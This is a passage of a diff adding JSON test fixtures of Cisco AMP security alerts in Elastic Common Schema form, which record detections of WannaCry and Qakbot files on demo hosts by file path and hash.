+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419247189909832000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419247189909831753",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500205814Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419247189909832000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229327140847658",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500207872Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419247189909832000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204897366867969",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500209928Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419247189909832000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179204872503298",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500212001Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419247189909832000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204897366867977",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:24:25.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500214055Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6412604589194871000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6412604589194870787",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:24:25.000Z",
+            "file": {
+                "name": "QuotaGroup.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe",
+                "hash": {
+                    "sha1": "f5a171c879b90e77861daf19741b373646d791ff",
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
+                    "md5": "32c9e6737dbdcbfb7563a3f27e2b1571"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
+                    "32c9e6737dbdcbfb7563a3f27e2b1571",
+                    "f5a171c879b90e77861daf19741b373646d791ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500216107Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6412604589194871000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412604589194870787",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:24:25.000Z",
+            "file": {
+                "name": "",
+                "path": "",
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500218150Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6412604589194871000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412604589194870786",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:24:25.000Z",
+            "file": {
+                "name": "QuotaGroup.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe",
+                "hash": {
+                    "sha1": "f5a171c879b90e77861daf19741b373646d791ff",
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
+                    "md5": "32c9e6737dbdcbfb7563a3f27e2b1571"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
+                    "32c9e6737dbdcbfb7563a3f27e2b1571",
+                    "f5a171c879b90e77861daf19741b373646d791ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500220195Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6412604589194871000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
